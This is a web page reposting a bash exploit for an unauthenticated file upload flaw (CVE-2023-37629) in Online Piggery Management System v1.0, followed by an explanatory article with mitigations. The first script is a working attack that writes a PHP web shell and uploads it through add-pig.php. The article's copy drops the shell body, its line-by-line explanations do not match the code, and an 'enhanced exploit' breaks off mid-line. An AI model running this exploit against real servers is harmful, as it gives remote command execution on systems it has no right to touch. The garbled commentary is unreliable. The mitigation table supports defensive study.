Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

Exploit Author: 1337kid Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2023-07-19 
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "
echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "
echo "                         @1337kid"
echo 

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi

}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi


Exploiting Unauthenticated File Upload Vulnerabilities: The Case of Online Piggery Management System v1.0

Security vulnerabilities in web applications often stem from poor input validation, inadequate access controls, or misconfigured file handling mechanisms. One such critical flaw—unauthenticated file upload—has recently gained attention due to its exploitation in real-world systems. A notable example is the Online Piggery Management System v1.0, a PHP-based application available on SourceCodester, which has been identified as vulnerable to unauthorized file uploads.

Understanding the Vulnerability

File upload functionality is a common feature in web applications, allowing users to submit images, documents, or other media. When implemented improperly, this feature can become a gateway for attackers to upload malicious payloads—such as web shells—without authentication.

According to CVE-2023-37629, the Online Piggery Management System v1.0 suffers from a critical vulnerability in its add-pig.php endpoint. The system allows users to upload a file named pigphoto without requiring any login or session validation. This creates a direct attack vector for remote code execution.

Exploit Mechanics: A Step-by-Step Breakdown

The exploit, crafted by security researcher 1337kid, demonstrates how an attacker can leverage this flaw to gain remote access to the server. Below is the core script used to trigger the vulnerability:


#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629

echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo 

if [[ $1 == '' ]]; then
 echo "No URL specified!"
 exit
fi

base_url=$1

unauth_file_upload() {
 # CVE-2023-37629 - File upload vuln
 echo "Generating shell.php"
cat > shell.php << EOF

EOF
 echo "done"
 curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
 req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
 if [[ $req == "200" ]]; then
 echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
 else
 echo "Failed to upload a shell"
 fi
}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
 unauth_file_upload
else
 echo "Error"
 echo "Status Code: $req"
fi

Explanation:

  • Line 1–5: The script begins with a banner and author attribution, typical in exploit scripts for identification and attribution.
  • Line 7–10: Checks if a URL argument is provided. If not, the script exits with an error message.
  • Line 12–18: Defines a function unauth_file_upload() responsible for generating and uploading a malicious PHP shell.
  • Line 14–17: Uses a cat command to create a file named shell.php containing a PHP web shell. The payload executes any command passed via the cmd parameter.
  • Line 18–20: Uses curl to send a multipart form request with pigphoto as the file field and submit=pwned as a dummy form field. This mimics a normal user upload.
  • Line 21–24: Checks if the uploaded shell is accessible by sending a GET request to uploadfolder/shell.php?cmd=id. The id command returns the current user’s ID, confirming the shell is active.
  • Line 25–29: Validates the HTTP status code of the initial request to ensure the target URL is reachable.

Why This Exploit Works

The root cause lies in the absence of authentication checks and improper file validation. The system does not:

  • Verify user credentials before allowing uploads.
  • Validate file extensions or MIME types.
  • Restrict upload directories to prevent arbitrary file placement.
  • Sanitize or filter content within uploaded files.

As a result, an attacker can upload a file containing executable PHP code, which is then stored in the uploadfolder directory. Since the server treats the file as executable, any request to it with a cmd parameter can execute arbitrary commands.

Real-World Impact and Risks

Such vulnerabilities pose severe risks in production environments. An attacker could:

  • Execute commands like whoami, ls, or cat /etc/passwd to gather system information.
  • Download sensitive data or configuration files.
  • Establish reverse shells to gain persistent access.
  • Deploy malware or pivot to other systems within the network.

Given that this system is labeled as a "free version" and hosted on a public code-sharing platform, it is likely used by small farms, educational institutions, or hobbyists. These users often lack the technical expertise to secure their systems, making them prime targets for exploitation.

Security Recommendations and Mitigations

Developers and administrators should implement the following best practices to prevent such vulnerabilities:

Best Practice Description
Authentication Required Ensure all file upload endpoints require valid user authentication.
File Type Validation Use whitelisting (e.g., only allow .jpg, .png) and reject executable file types like .php.
Directory Restriction Store uploaded files in non-executable directories (e.g., uploads/ with noexec flag).
Content Scanning Scan uploaded files for malicious patterns (e.g., system(), exec()) using static analysis or sandboxing.
Logging and Monitoring Log all file uploads and monitor for unusual patterns (e.g., repeated PHP file uploads).

Improved Exploit Script (Security-Focused)

While the original exploit is functional, it can be improved for robustness and safety. Below is a corrected version with enhanced error handling and dynamic path detection:


#!/bin/bash
# Enhanced exploit for Online Piggery Management System v1.0
# CVE-2023-37629 - Unauthenticated File Upload

set -e

if [[ -z "$1" ]]; then
  echo "Usage: $0 "
  exit 1
fi

TARGET="$1"
UPLOAD_DIR="uploadfolder"
SHELL="shell.php"

# Create malicious PHP shell
cat > "$SHELL" << 'EOF'

EOF

echo "Payload created: $S